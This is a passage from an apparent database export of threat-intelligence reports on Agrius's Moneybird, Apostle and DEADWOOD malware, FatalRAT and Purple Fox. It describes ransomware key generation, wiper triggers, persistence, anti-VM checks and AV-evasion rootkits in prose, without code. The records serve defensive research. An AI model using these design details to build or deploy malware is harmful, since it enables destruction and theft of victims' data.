four\nadditional DWORDs.\n\n The first DWORD in this sequence acts as a flag,\n\nwhich determines whether the ransomware should\ntake into account its embedded list of 194 extensions\nto target. The extension list includes the most\ncommon document formats, database formats,\ncertificates, etc. A value of 1 means the list is\nconsulted, while a value of 2 causes the\nransomware to ignore the list and encrypt all files in\nthe targeted paths indiscriminately, except for those\nkept in a narrow list of file extensions that are never\nencrypted: exe, dll, sys, msi, lnk.\n\n The second DWORD in the sequence contains the\nmaximum number of threads that are created to\nencrypt every targeted file.\n\n The third DWORD contains the number of threads\nassigned to the routine that is executed before the\nencryption. This ensures that the targeted files are not\nmarked as SYSTEM elements to be avoided.\n\nIt is noteworthy to mention that the drawback of\nthis approach is its lack of effectiveness in\ncomparison to other ransomware strains that utilize\nthe WIN API GetSystemInfo or directly access\nPEBdwNumberOfProcessors. By using these\n\n\fmethods, they can dynamically determine the\nnumber of CPUs per system and assign the\nencryption logic an appropriate number of threads\nbased on this number.\n\n The final DWORD in the sequence specifies the size\n\nof an ASCII string that comes next. This string\ncontains the base64-encoded public key that is used\nto encrypt the symmetric encryption keys that are\ngenerated per file.\n\nImmediately following the public key, the configuration\ncontains an integer value that determines the number of\nnull-terminated strings that come next. These strings\nindicate the paths on the target machine that the sample\nencrypts, which is somewhat unusual as these malware\nusually try to cipher as much data as possible. In this\nparticular case, there is only one path F:\\User Shares,\nresulting in all other system paths being omitted. The\nremaining space in the configuration (up to 1024 bytes,\nincluding the previous elements) is reserved for possible\nadditional system path entries. If no more entries are\nadded, the remaining space is filled with the character A,\nas in this sample.\n\nIf there is no path entry in the configuration, the malware\nbehaves in a more generic fashion and uses the WIN API\n\n\ffunction GetLogicalDrives to obtain a list of currently\navailable disk drives on the targeted machine and then\nstarts to process it.\n\nThe configuration structure in decompiled C form:\n\nThe encryption logic of this ransomware sample depends\non several embedded libraries, including libgcrypt,\nwhich is easily identifiable in the sample strings.\n\nLooking at the folder name inside the strings, it is likely\nthat the library was compiled from this GitHub repository.\nBasically, the repository contains an unofficial version of\nlibgcrypt, which the authors tried to make easier to\ninclude in Visual Studio projects.The malware also uses\nlibpgp-error, a library that libgcrypt requires as a\ndependency.\n\nFinally, the malware is also linked with a copy of the\ncryptopp library. This library can be easily identified by\nstrings that directly reference its name, as well as a\ndistinctive test string that is used as text to encrypt in\nmany versions of this library.\n\nFigure 5  cryptopp use in Moneybird.\n\n\fThe ransomware uses the functions provided by the\nlibraries to perform encryption using AES-256 with GCM\nmode. The definition of both constants can be obtained\nfrom the source code of the library at the following link.\n\nFigure 6  Ransomware encryption using AES-256.\n\nAs you can see in the image above, the IV\n012345678901255 for AES-256-GCM is hardcoded\ninside the ciphering function while the key is passed as\nthe last parameter to the function.\n\nThe code responsible for the generation of the key:\n\nFigure 7  Key generation code.\n\nThis code is executed for each file, so each one is\nassigned a unique encryption key. To generate a key, the\nsample concatenates a GUID (marked in red) obtained\nthrough the WIN API CoCreateGuid with a random\nnumber (marked in green) generated using the rand()\nfunction. The seed for the rand() function is based on\nthe system time. Then, 8 bytes of the file content\n(marked in blue) to be encrypted is concatenated. Finally,\nthe full path for the target file (marked in purple) is\nadded, but only 4 bytes of it are used as the last part of\nthe key as it completes the 32-byte chunk.\n\n\fFigure 8  Encryption key structure.As a result, this is\nwhat the key structure looks like:\n\nThe utilization of a GUID obtained through the WIN API\nCoCreateGuid makes it very difficult to obtain the\nencryption key, as it is generated by making an RPC call\nto UuidCreate, which gets its randomness by calling\nProcessPrng from bcryptPrimitives.dll, as this\nfunction is cryptographically secured to generate random\nbytes.\n\nAfter the full path of the target file that overflows the\n32-byte aes_key, the malware adds the length of the\n\nThis structure is encrypted by the hybrid encryption\nsystem Elliptic Curve Integrated Encryption Scheme\n CryptoPP ECIES  using the embedded public key\nshown previously inside the samples configuration. After\nthe file encryption, this encrypted meta_info structure is\nappended at the end of the final file, resulting in the struct\nbelow:\n\nConclusion\n\nOur analysis of incidents involving Moneybird reveals the\nongoing effort of Agrius to utilize ransomware to make an\nimpact. Although Agrius has used different aliases in the\n\n\fpast, public reports up to now have tied most of their\ndestructive activities to variants of Apostle, which acted as\nwipers or ransomware. The use of a new ransomware\ndemonstrates the actors additional efforts to enhance\ncapabilities, as well as hardening attribution and detection\nefforts.\n\nDespite these new covers, the group continues to follow\nits usual behavior and utilize similar tools and techniques\nas before. Moneybird, like many other ransomware, is a\ngrim reminder of the importance of good network hygiene,\nas significant parts of the activity could have been\nprevented early on.\n\nMoneybird itself, although not particularly complex, has a\nnumber of intriguing features that appear to have been\ndesigned for specific targets. Some of these specialty\nfeatures make the malware less practical for use in\nmultiple unrelated campaigns. This emphasizes the\nmalwares targeted nature, including the use of targeted\npaths which, in the specific sample we analyzed, makes\nthe ransomware ignore most of the files on the target\nmachine.\n\nCheck Point researchers say the threat actors initially gain access to corporate\n\nnetworks by exploiting vulnerabilities in public-facing servers, giving Agrius\n\nan initial foothold within the organization's network.\n\n\fExpensive Investigations Drive Surging Data\n\nBreach Costs\n\nNext, the hackers hide behind Israel-based ProtonVPN nodes to deploy\n\nvariants of ASPXSpy webshells hidden inside \"Certificate\" text files, a tactic\n\nthat Agrius has used in previous campaigns.\n\nHaving deployed the webshells, the attackers proceed to use open-source tools\n\nthat help in network reconnaissance using SoftPerfect Network Scanner,\n\nlateral movement, secure communication using Plink/PuTTY, credential\n\nstealing with ProcDump, and the exfiltration of data using FileZilla.\n\nIn the next phase of the attack, Agrius fetches the Moneybird ransomware\n\nexecutable from legitimate file hosting platforms like 'ufile.io' and\n\n'easyupload.io.'\n\nUpon launch, the C++ ransomware strain will encrypt target files using\n\nAES-256 with GCM (Galois/Counter Mode), generating unique encryption\n\nkeys for every file and appending encrypted metadata at their end.\n\nIn the cases seen by Check Point, the ransomware only targeted \"F:\\User\n\nShares,\" a common shared folder on corporate networks used to store\n\ncorporate documents, databases, and other collaboration-related files.\n\nThis narrow targeting indicates that Moneybird aims more at causing business\n\ndisruption than locking down the impacted computers.\n\n\fCheck Point explains that data restoration and file decryption would be\n\nextremely challenging since the private keys used for encrypting each file are\n\ngenerated using data from the system GUID, file content, file path, and\n\nrandom numbers.\n\nAfter the encryption, ransom notes are dropped on the impacted systems\n\nurging the victim to follow the provided link within 24 hours for directions on\n\nrestoring their data.\n\n\"Hello WE ARE MONEYBIRD! All of your data encrypted! If u want you to\n\nrestore them follow this link with in 24H,\" reads the Moneybird ransom note.\n\nUnlike previous attacks linked to Agrius, Moneybird is believed to be\n\nransomware, rather than a wiper, meant to generate revenue to fund the\n\nthreat actors' malicious operations.\n\nHowever, in the case seen by Check Point Research, the ransom demand was\n\nso high that it was known from the start that a payment would unlikely be\n\nmade, making the attack essentially destructive.\n\n\"Yes negotiations could be possible but the demand was extremely high, which\n\nleads us to believe that its part of the trick. They knew no one would pay so\n\nthe damage and data leaked was expected. It was not a wiper,\" Eli Smadga,\n\nResearch Group Manager at Check Point Research, told BleepingComputer.\n\nA simple, but effective, ransomware\n\nCheck Point explains that Moneybird lacks command-line parsing capabilities\n\nthat allow victim-specific configurations and more deployment versatility and\n\ninstead relies on an embedded configuration blob.\n\n\fThis means the ransomware's behavior parameters are pre-defined and\n\ncannot be easily adjusted for each target or circumstance, making the strain\n\nunsuitable for mass campaigns.\n\nFor Agrius, however, Moneybird is still an effective business-disruption tool,\n\nand further development leading to the release of newer, more capable\n\nversions might make it a formidable threat to a broader range of Israeli\n\norganizations.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-20T16:20:06.785Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_on": {
    "$date": "2023-09-29T19:42:27.595Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "650b2e560e27f4aa83e4beee"
  },
  "name": "Apostle",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Apostle.pdf",
  "file_size": "84 KB",
  "content": "Researchers say they have uncovered never-before-seen disk-wiping malware that is\ndisguising itself as ransomware as it unleashes destructive attacks on Israeli targets.\n\nApostle, as researchers at security firm SentinelOne are calling the malware, was initially\ndeployed in an attempt to wipe data but failed to do so, likely because of a logic flaw in its\ncode. The internal name its developers gave it was wiper-action. In a later version, the bug\nwas fixed and the malware gained full-fledged ransomware behaviors, including the ability\nto leave notes demanding that victims pay a ransom in exchange for a decryption key.\n\nEnter your email to get the Ars Technica newslette\n\nIn a post published Tuesday, SentinelOne researchers said they assessed with high\nconfidence that based on the code and the servers Apostle reported to, the malware was\nbeing used by a newly discovered group with ties to the Iranian government. While a\nransomware note the researchers recovered suggested that Apostle had been used against\na critical facility in the United Arab Emirates, the primary target was Israel.\n\nADVERTISING\n\nThe usage of ransomware as a disruptive tool is usually hard to prove, as it is difficult to\ndetermine a threat actors intentions, Tuesdays report stated. Analysis of the Apostle\nmalware provides a rare insight into those kinds of attacks, drawing a clear line between\nwhat began as a wiper malware to a fully operational ransomware.\n\nThe researchers have dubbed the new hacking group Agrius. SentinelOne saw the group\nfirst using Apostle as a disk wiper, although a flaw in the malware prevented it from doing\nso, most likely because of a logic error in its code. Agrius then fell back on Deadwood, a\nwiper that had already been used against a target in Saudi Arabia in 2019.\n\nAdvertisement\n\nAgrius' new version of Apostle is full-fledged ransomware.\n\nWe believe the implementation of the encryption functionality is there to mask its actual\nintentiondestroying victim data, Tuesdays post stated. This thesis is supported by an\nearly version of Apostle that the attackers internally named wiper-action.\n\nApostle has major code overlap with a backdoor, called IPSec Helper, that Agrius also uses.\nIPSec Helper receives a host of commands, such as downloading and executing an\nexecutable file, that are issued from the attacker's control server. Both Apostle and IPSec\nHelper are written in the .Net language.\n\n\fAgrius also uses webshells so that attackers can move laterally inside a compromised\nnetwork. To conceal their IP addresses, members use the ProtonVPN.\n\nAn affinity for wipers\n\nIranian-sponsored hackers already had an affinity for disk wipers. In 2012, self-replicating\nmalware tore through the network of Saudi Arabia-based Saudi Aramco, the worlds largest\ncrude exporter, and permanently destroyed the hard drives of more than 30,000\nworkstations. Researchers later identified the wiper worm as Shamoon and said it was the\nwork of Iran.\n\nIn 2016, Shamoon reappeared in a campaign that struck at multiple organizations in Saudi\nArabia, including several government agencies. Three years later, researchers uncovered a\nnew Iranian wiper called ZeroCleare.\n\nApostle isnt the first wiper to be disguised as ransomware. NotPetya, the worm that inflicted\nbillions of dollars of damage worldwide, also masqueraded as ransomware until researchers\ndetermined that it was created by Russian government-backed hackers to destabilize\nUkraine.\n\nSentinelOne Principal Threat Researcher Juan Andres Guerrero-Saade said in an interview\nthat malware like Apostle illustrates the interplay that often occurs between financially\nmotivated cybercriminals and nation-state hackers.\n\nThe threat ecosystem keeps evolving, with attackers developing different techniques to\nachieve their goals, he said. We see cybercriminal gangs learning from the better\nresourced nation-state groups. Likewise, the nation-state groups are borrowing from\ncriminal gangsmasquerading their disruptive attacks under the guise of ransomware with\nno indication as to whether victims will in fact get their files back in exchange for a ransom.\n\nRansomware is a highly destructive form of malware, but it turns out that it can also provide the perfect\n\ncover for disk wiping malware.\n\nThe pitfalls of becoming a victim of ransomware are well documented. And, as such, the term\n\nransomware is one that strikes fear into the heart of any PC user. But, at the very least, ransomware does\n\ngive you an option of getting your files back. Naturally, you have to pay a ransom fee for the files to be\n\ndecrypted, but you can get them back. However, a form of malware called Apostle has now been\n\ndiscovered which pretends to be ransomware when, in fact, it simply wipes your disk drive beyond\n\nretrieval.\n\n\fData is a crucial commodity in any organization, so its important you make it as secure as possible. And\n\none of the perfect ways to do this is by understanding how Apostle works.\n\nHow Does Apostle Wipe Disks?\n\nThe Apostle malware is believed to originate from Iran and is related to a previous wiper malware called\n\nDeadwood. Apostle is not brand new as it has been in the digital wild for some time. But these initial\n\nversions of Apostle were flawed and failed to deliver their malicious payload. Since then, the designers of\n\nApostle have tweaked its design to make it more effective. This contemporary version of Apostle presents\n\nitself as standard ransomware, but this is merely to throw the victims off guard; its true intent is to destroy\n\ndata and cause disruption.\n\nThe hackers behind Apostle are particularly cunning and are also happy to take ransom payments while\n\ndestroying the data in question. But this is not where the attack ends. There are signs that Apostle is\n\nbeing used in conjunction with a backdoor attack called IPSec Helper. This allows the hackers to\n\ndownload and execute additional malware and move, undetected, within infected networks. Again, the\n\nintention here is to cause disruption.\n\nHow Do You Stop Your Disk Being Wiped?\n\nThe focus of Apostle, so far, has been Israeli targets, but this does not mean it should be considered a\n\nlow-level threat. The design of this disk wiper malware can easily be engineered into more virulent and\n\ndangerous forms. And this could easily strike at the heart of your business operations. Therefore, its\n\ncrucial that you maintain the following practices:\n\n Evaluate All Attachments Before Opening: Its likely that you receive numerous email\n\nattachments through the day, but how often do you verify them before opening? Trusted email\n\naddresses can, very easily, be taken over or even replicated. And this provides the perfect route\n\n\ffor infected files to be opened. So, if in doubt over whether an attachment is safe, always check\n\nwith an IT professional before opening.\n\n Train Your Staff on Social Engineering Attacks: The dangers of social engineering are very\n\nreal and represent a simple way for hackers to get a foothold in your network. Understanding this\n\nthreat and how to protect yourself against it is vital.\n\n Keep Your Software Updated: Another sure-fire way for hackers to gain access to your network\n\nis through vulnerabilities caused by outdated software. The best way to counter this threat is by\n\nimplementing software updates as soon as possible. This minimizes the presence of\n\nvulnerabilities and keeps hackers out.\\\n\nAn Iran-linked advanced persistent threat group is using new ransomware while\n\ntargeting a familiar adversary in the Middle East, researchers have found.\n\nCheck Points Incident Response Team investigated the deployment of the\n\nransomware against Israeli organizations and claimed by a group dubbing itself\n\nMoneybird. Researchers found that it bore the hallmarks of Agrius, a hacker group\n\nthat has been around since 2020 and has attempted to disguise itself with aliases\n\nlike BlackShadow.\n\nThe group is known for having targeted the Israeli insurance company Shirbit with\n\nransomware in late 2020 and Bar-Ilan University in 2021, and for deploying wiper\n\nattacks.\n\nAccording to Check Point investigators, Moneybird is a new product for the group.\n\nMost of its previous attacks have been carried out with ransomware called Apostle.\n\nThe use of a new ransomware, written in C++, is noteworthy, they wrote, as it\n\ndemonstrates the groups expanding capabilities and ongoing effort in developing\n\nnew tools.\n\nThe researchers did not elaborate on the sort of organizations targeted but said,\n\ndespite the new payload, the techniques used bore the stamp of Agrius.\n\n\fAs in previous attacks, the threat actors gained entry via public-facing web servers\n\nand the deployment of unique variants of ASPXSPY  a malicious script they hid\n\ninside Certificate text files.\n\nThey then moved laterally within networks, conducting reconnaissance and\n\nexfiltrating data. The group uses targeted paths that program the ransomware to\n\ndisregard most files on a targeted network, Check Point said.\n\nMoneybird, like many other ransomware, is a grim reminder of the importance of\n\ngood network hygiene, as significant parts of the activity could have been prevented\n\nearly on, the researchers said.\n\nA recent report from Microsoft Threat Intelligence found that the Iranian government\n\nis increasingly focused on combining influence operations with cyberattacks. They\n\nlinked 24 cyber-enabled operations to the Iranian government last year, compared\n\nto seven the year before, and found a corresponding decline in the sorts of\n\nransomware and wiper attacks typically deployed by Agrius.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-20T17:39:34.997Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650b4d3d29c38b96bdcaafa6"
  },
  "name": "Agrius",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Agrius.pdf",
  "file_size": "52 KB",
  "content": "A previous cyberattack on an Israeli software developer is being used by Agrius\n\nAdvanced Persistent Threat (APT) group to launch wiper attacks against various\n\norganizations in the diamond industry.\n\nAlthough Agrius and its attack against Israeli IT and HR companies last February was\n\npreviously known, using the \"Fantasy\" wiper in attacks is new, according to researchers\n\nat ESET.\n\nFantasy is a modified iteration of the Apostle malware, the team said. But while its\n\npredecessor Apostle masqueraded as ransomware, Fantasy dispenses with the\n\ncharade and moves directly to destroying files.\n\nSo far, ESET reported, Fantasy victims have been found in Hong Kong, Israel, and\n\nSouth Africa.\n\n\"Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab\n\nEmirates since 2020,\" ESET researchers explained. \"Agrius exploits known\n\nvulnerabilities in internet-facing applications to install webshells, then conducts internal\n\nreconnaissance before moving laterally and then deploying its malicious payloads.\"\n\nThe Agrius threat group utilizes VPN services (primarily ProtonVPN) for\nanonymization when accessing the public facing applications of its targets. Upon\nsuccessful exploitation, the threat actor deploys webshells or simply accesses the\ntarget by using the target organizations VPN solution. The webshells Agrius deploys\nare mostly variations of ASPXSpy.\n\nAgrius uses those webshells to tunnel RDP traffic in order to leverage compromised\naccounts to move laterally. During this phase, the attackers use a variety of publicly\navailable offensive security tools for credential harvesting and lateral movement.\n\nOn interesting hosts, the threat actor deploys its own custom malware. This\nbackdoor is written in .NET and appears exclusive to Agrius. The malware registers\nitself as a service to achieve persistence. It can be used to exfiltrate data or deploy\nadditional malware Agrius has deployed two different wipers. The first, dubbed\nappears to be written by the same developer as IPsec Helper. Both are written in\n.NET, share functions, and execute tasks in a similar manner. Interestingly, Apostle\nwas later modified into functioning ransomware. The second wiper, DEADWOOD,\nwas previously involved in a wiping attack in the Middle East and tentatively\nattributed to Iran though we have been unable to confirm this independently.\n\n\fThe main implant used by Agrius is IPsec Helper, which is a custom .NET backdoor.\nThe backdoor provides basic functionality like uploading of files from the infected\nsystem, running commands, and deploying additional executables. It connects back\nto C2 servers over HTTP based on a configuration file. The tool is run as a service,\nsuggesting it is executed once the threat actor has achieved elevated privileges.\nWhat appears to be authentic victim uploads of IPsec Helper samples were submitted\nto VirusTotal from Israel and the United Arab Emirates.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-20T19:51:25.187Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650b5cc454d5ba1acf505859"
  },
  "name": "Deadwood",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Deadwood.pdf",
  "file_size": "59 KB",
  "content": "Agrius also utilized DEADWOOD (aka Detbosit), a wiper malware written in C++\nusing the Boost libraries. This wiper was previously reported, although barely\ndiscussed compared to other Middle-Eastern wiper malware. According to publicly\navailable information, it was involved in a wiping attack in Saudi Arabia in 2019.\n\nD E A D W O O D\n\nA n a l y s i s\n\nThe wiper can be executed in two modes: as a Service and as a Windows\nApplication. Executing it in either of the modes will also cause an attempt to execute\nthe other as some of the features work in only one of the modes. The name of the\nservice varies across different versions. In the most recent version, the service\ncreated by DEADWOOD is named ScDeviceEnums.\n\nThe malware operates based on a configuration file, which lists which functionalities\nto execute. The configuration file for newer DEADWOOD samples is embedded\nwithin the executable as a resource named METADATA, encrypted using AES. In\nolder versions of the malware, the configuration comes as a single flag passed on\nthe command line or read from a file on disk.\n\nOne of the parameters within the configuration file is TimeStamp, which is used to\ndetermine when the wiper functionality starts. When the timestamp is met, a trigger\nfile will be created on the Windows drive, initiating the wiping activity. If the\ntimestamp is in the past, the wiper will execute immediately. This can help\ncoordinate wiping of different machines within the network, enabling maximum\nimpact.\n\nDEADWOOD attempts to execute a service and a WinApp\n\nDecrypted DEADWOOD parameters extracted from sample\n\nDEADWOOD checks for existence of trigger file Microsoft.Help.dll.iso 2 0 F R O M W I P E R\nTO R A N S O M W A R E : T H E E VO LU T I O N O F AG R I U S Some of the commands within the\nconfiguration file are there to ensure its proper execution by preventing the user\nfrom accessing the machine.\n\nRegardless of the configuration, DEADWOOD will attempt to overwrite files using\nrandom data. The additional commands within the configuration file regard the\nactual wiping operation.\nWith a proper configuration, the impact of the malware might actually look like\nransomware, as random data is written over the original content of the files without\ndeleting them. Unlike ransomware, however, data wiped by DEADWOOD can not be\nrecovered by the threat actor (it can only be restored from a previous backup, if one\nexists)\nThe parameter COMMAND_ALL appears to be deprecated and does not affect the\nactual execution of the malware.The version of DEADWOOD deployed by Agrius is\na newer version of the previously reported malware. Other than the minor changes,\n\n\fsuch as the change of the service name and trigger file, new features were\nintroduced including.\nSome of the strings within the binary are XORed with the byte 0xD5 and are\ndeobfuscated at runtime.\n\nThe configuration is embedded within the executable using AES.\n\nThe Windows Application part checks if it is executed in the active session, and if\nnot, reruns itself in the active session.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-20T20:57:40.717Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650c6ad4d0caba483415d983"
  },
  "name": "FatalRat",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "FatalRat.pdf",
  "file_size": "90 KB",
  "content": "AT&T Alien Labs has recently observed the presence of a new remote access trojan\n(RAT) malware in its threat analysis systems. The malware, known as FatalRAT,\nappears to be distributed via forums and Telegram channels, hidden in download links\nthat attempt to lure the user via software or media articles.\n\nKey takeaways:\n\n AT&T Alien Labs performed a malware analysis of the FatalRAT threat.\n We have observed a new spreading mechanism via Telegram channels.\n Analyzed samples are capable of performing defense evasion techniques,\nobtaining system persistence, logging user keystrokes, collecting system\ninformation, exfiltrating over encrypted command and control (C&C) channel.\n\nAnalysis\n\nFatalRAT is a remote access trojan with a wide set of capabilities that can be executed\nremotely by an attacker. The malware runs several tests before fully infecting a system,\nchecking the existence of multiple virtual machine products, disk space, number of\nphysical processors, and more (T1497.001).\n\nOne of the tests run by FatalRAT involves checking for existence of virtual machine\nservices, as shown in figure 2.\n\nAnother includes querying the registry, as shown in figure 3.\n\nIf the machine passes the malware AntiVM tests, FatalRAT will then starts its malicious\nactivity.\n\nFirst, it decrypts each of the configuration strings separately (T1027). These\nconfiguration strings include the Command and Control (C&C) address, new malware\nfile name, service name, and other settings.\n\nFigure 5 shows the routine used by FatalRAT for decrypting strings.\n\n\fThe malware will disable the ability to lock the computer by using CTRL+ALT+DELETE.\nFor this purpose, the registry key DisableLockWorkstation is set to 1 as shown in\nfigure 6 (T1112).\n\nAfter the computer lockdown is disabled, the malware activates a keylogger\n(T1056.001). See figure 7.\n\nFatalRat can persist either by modifying the registry (T1547.001) or by creating a new\nservice (T1569.002). If persistence is done by modifying the registry, it will create the\nvalue 'Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7' to execute the malware\nat boot time. When using setting service for persistence, FatalRat will retrieve the\ndescription from its configuration as seen above in figure 4.\n\nThe malware collects information from an infected machine and sends it to the C&C\n(T1020), as shown in figure 9. This includes external IP address, username, and other\ninformation about the victim.\n\nAdditionally, as a defense evasion technique, FatalRAT identifies all security products\nrunning on the machine by iterating through all running processes and searching for the\nexistence of a predefined list of security products (T1562.001), as shown in figure 10.\n\nFurthermore, to make it easier for the attacker to detect which security products are\ninstalled, it will convert the process name above to a product name before sending the\nlist to the C&C.\n\nTo communicate back to the C&C, the malware uses an arithmetic routine to encrypt the\ndata sent between the victim and the attacker. This encryption includes a one-byte XOR\nkey and the addition of a constant to the obtained value (121 in this case) (T1573.001).\nSee figure 12.\n\nThe encrypted message is then sent to the C&C as seen in the config from figure 4\nthrough port 8081.\n\nFigure 13. Encrypted communication between infected host and C&C.\n\nThe malware then waits for the attackers commands, of which it supports a wide range.\nFor example, it has several routines to handle different browsers. Some of these\nroutines include deleting user info for specific browsers (Edge, 360Secure Browser,\n\n\fQQBrowser, SogouBrowser, and Firefox). For Chrome, it will query for user info and\nthen delete the content. Deleting saved information will force the user to input, for\nexample, user and password which the malware can capture with its keylogger. (T1119)\n\nSome of the commands FatalRat supports are shown below.\n\nSpreading itself on the victim network by brute-forcing weak passwords through IPC$. If\nsuccessful, the malware copies itself to the dedicated folder as\n%Folder%\\hackshen.exe and will execute the copied file remotely. See figures 15-17.\n\nEither steal stored data (for chrome for example) or delete saved information with a\nhandler for different browsers. See figure 18.\n\nFatalRat also includes additional commands, for the following:\n\n Keylogger\n Change resolution\n Uninstall UltraViewer\n Download and install AnyDesk\n Execute shell commands\n Modify registry keys\n Download and execute a file\n\nRecommended actions\n\n1. Do not click links or install software from unknown sources.\n2.\n3. Always use an endpoint detection and response (EDR) solution or enable system\n\nInstall an antivirus and keep your system updated.\n\nlog monitoring to allow SIEM correlation.\n\n4. Monitor network traffic to command and control (C&C) patterns.\n\nConclusion\n\n\fThe newly identified FatalRat malware has been using techniques like obfuscation,\nanti-sandbox and antivirus evasion, encrypted configurations, logging user keystrokes,\nsystem persistence, login brute force, collection of system data, and encrypted\ncommunications with command and control server. Alien Labs has discovered multiple\nsamples in the past few months, with a slight dip in July. However, we expect to\ncontinue to see the presence of FatalRat and its variants in our samples in the near\nfuture. AT&T Alien Labs will continue to monitor this threat and update intelligence as\nactivity emerges.\n\nWe have been continuously tracking the Purple Fox threat since it first made\nwaves in 2018, when it reportedly infected over 30,000 users worldwide. In\n2021 we covered how it downloaded and executed cryptocurrency miners,\nand how it continued to improve its infrastructure while also adding new\nbackdoors.\n\nThis most recent investigation covers Purple Foxs new arrival vector and the\nearly access loaders we believe are associated with the intrusion set behind\nthis botnet. Our data shows that users machines are targeted via trojanized\nsoftware packages masquerading as legitimate application installers. The\ninstallers are actively distributed online to trick users and increase the overall\nbotnet infrastructure. Other security companies have also reported on Purple\nFoxs recent activities and their latest payloads.\n\nThe operators are updating their arsenal with new malware, including a\nvariant of the remote access trojan FatalRAT that they seem to be\ncontinuously upgrading. They are also trying to improve their signed rootkit\narsenal for antivirus (AV) evasion to be able to bypass security detection\nmechanisms. These notable changes are covered in the sections below and\nfurther explained in our technical brief.\n\nPurple Fox infection chain and payload updates\n\n\fThe attackers distribute their malware using disguised software packages that\nencapsulate the first stage loader. They use popular legitimate application\nnames like Telegram, WhatsApp, Adobe, and Chrome to hide their malicious\npackage installers.\n\nThe installers include a specific single character (highlighted in Figure 1 as\nA) that corresponds to a specific payload. The second stage payload is\nadded as the single character in the request sent by the execution parent to\nthe first stage command and control (C&C) server (illustrated in detail in\nFigure 2 as r). It is retrieved through the module filenames last character,\nthen the first stage C&C server will log the execution timestamp sent in the\nrequest alongside the character. The single character will then determine what\npayloads will be sent back for the malicious installer to drop on the infected\nmachine.\n\nIn previous campaigns in 2019, HTTP file servers (HFS) were used by Purple\nFox to run the C&C servers that host files on the infected bots. In this most\nrecent investigation, we found an exposed HFS that the Purple Fox group\nuses to host all the second stage samples with their update timestamps. We\nwere able to track the frequency of the second stage updated packages\npushed to this exposed server using the timestamp data. Figure 3 shows the\nnumber of different second stage malicious packages that received updates.\nThey are still actively updating their components at the time of writing.\n\nNotable Purple Fox tools and techniques\n\nDisguised packages and malicious components in svchost.txt\n\n\fWe noted that some of the software they were impersonating were commonly\nused by Chinese users. The following list shows the recently used software\nand the corresponding malicious payload for the second stage of the infection.\nAs mentioned above, the different payloads will be served by the C&C upon\nexecution based on the last character in the module filename.\n\nWe tracked a server hosting the second stage payloads and saw a\ncompressed RAR archive holding the second stage loaders along with the file\nsvchost.txt, which contains all the malicious portable executable (PE) module\ncomponents that will be dropped in the second stage.\n\nThe order of the PE modules inside svchost.txt is dependent on the package\nrequested by the malicious installers. As previously mentioned, the last\ncharacter in the installer filename will determine the final set of the auxiliary\nmodules that will be stuffed inside svchost.txt.\n\nShellcode user-mode loader and anti-forensics methods\n\nA specific set of portable executable (PE) modules found in one of the most\ndistributed clusters from the malware had a wide range of capabilities in terms\nof AV evasion. This cluster is noteworthy for various reasons as well  it has\nlinks to older families, it loaded a previously documented Purple Fox MSI\ninstaller, and it had different rootkit capabilities in the auxiliary PE modules.\nMore details about this cluster can be found in our technical brief.\n\nAfter analyzing all the observed malicious execution parents delivering\ndifferent clusters, we found that the shellcode component at the prologue of\nthe dropped svchost.txt was similar across all the different variants, regardless\n\n\fof the actual payloads embedded after the shellcode. It has two different\nimplementations across all the clusters.\n\nThe first shellcode implements four main functions for the intended\nfunctionality, as shown in Figure 4.\n\nMeanwhile, the new shellcode is more minimalistic because it implements\nonly important functionalities to load a PE in memory and parse several\nsystem APIs addresses. It resolves different system APIs from the first one we\nmentioned.\n\nOne more thing to note: the Purple Fox group implements a customized\nuser-mode shellcode loader that leaves little traces for cybersecurity\nforensics. It minimizes both the quantity and quality of the forensic evidence\nas the execution doesnt rely on the native loader and doesn't respect the PE\nformat for a successful execution.\n\nThe use of FatalRAT and incremental updates\n\nAfter the shellcode loads and allocates memory for the PE modules inside\nsvchost.txt, the execution flow will call into the first PE module found after the\nshellcode. This is a remote access trojan (RAT) that inherits its functionality\nfrom a malware known as FatalRAT, a sophisticated C++ RAT that implements\na wide set of remote capabilities for the attackers.\n\nThe executed FatalRAT variants shown in Figures 5 and 6 differ across each\ncluster, illustrating that the attackers are incrementally updating it.\n\n\fThe RAT is responsible for loading and executing the auxiliary modules based\non checks performed on the victim systems. Changes can happen if specific\nAV agents are running or if registry keys are found. The auxiliary modules are\nintended as support for the groups specific objectives.\n\nNew capabilities to evade cybersecurity mechanisms\n\nOne of the analyzed executables embedded in svchost.txt is a user-mode\nclient used to interface with the accompanying rootkit module. This client\nsupports five different commands, each command implements a specific\nfunctionality to be executed from the kernel driver with the appropriate\ninput/output control (IOCTL) interface exposed. Table 2 shows the details of\neach command:\n\nThe functionality to kill a mini-filter is notable in terms of AV evasion. File\nsystems are targets for input-output (I/O) operations to access files, and file\nsystem filtering is the mechanism by which the drivers can intercept calls sent\nto the file system  this specifically is useful for AV agents. The model called\nfile system mini-filters was developed to replace the legacy filter mechanism.\nMini-filters are easier to write and are the preferred way to develop file system\nfiltering drivers in almost all AV engines.\n\nWe looked deeper into the mini-filter driver killer and how the attackers\nimplemented this functionality. The driver first 